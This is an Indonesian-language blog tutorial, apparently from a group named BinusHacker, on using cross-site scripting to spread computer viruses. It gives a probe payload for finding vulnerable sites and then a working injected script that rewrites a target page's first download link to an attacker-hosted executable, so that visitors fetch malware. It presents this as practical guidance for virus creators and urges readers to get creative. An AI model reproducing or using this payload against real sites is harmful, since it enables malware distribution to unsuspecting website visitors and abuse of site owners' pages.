XSS Untuk Penyebaran Virus


Saatnya beraksi agar kalian bisa mengetahui, pake tools apa sih para virus creator untuk menyebarkan virusnya?
Semua pasti bertanya-tanya, para virus creator menggunakan apa sih untuk menyebarkan virus? Berikut ini adalah beberapa cara bagaimana virus creator menyebarkan virusnya:
1. Email
2. Phising
3. USB
4. Hacking
5. Cracking

Kita memilih dengan cara Hacking & Cracking yaitu dengan menggunakan XSS!
Skenarionya adalah:
1. Kita memiliki situs virus / menempatkan sebuah virus di situs, misal: http://www.situssaya.com/virussaya.exe
2. Kita memiliki target yang memiliki vulnerability untuk XSS, misalkan: http://www.target.com/index.php?download=<script>alert(“BinusHacker Was Here”)</script> apabila muncul alert box, berarti website tersebut memiliki vulnerability.
Bagi yang menggunakan Mozilla Firefox, silakan download tools berikut untuk melakukan check XSS:

Download XSS Tools

Nah, langsung saja pada praktek!
Ubah saja yang ada di web target menjadi seperti berikut untuk menyebarkan virus:
http://www.target.com/index.php?download=<script>window.onload = function() {var AllLinks=document.getElementsByTagName(“a”); AllLinks[0].href = “http://www.situssaya.com/virussaya.exe”; }</script>
Kesimpulan:
Setiap ada user yang melakukan download di website tersebut, yang akan terdownload adalah virus yang kita miliki.
Gunakan imajinasi anda, agar bisa lebih berkreasi kembali.
Berikut adalah contoh, penjelesan dan video mengenai XSS Persistence Demo
Semoga artikel di atas bermanfaat & selamat berkreasi di tahun baru :)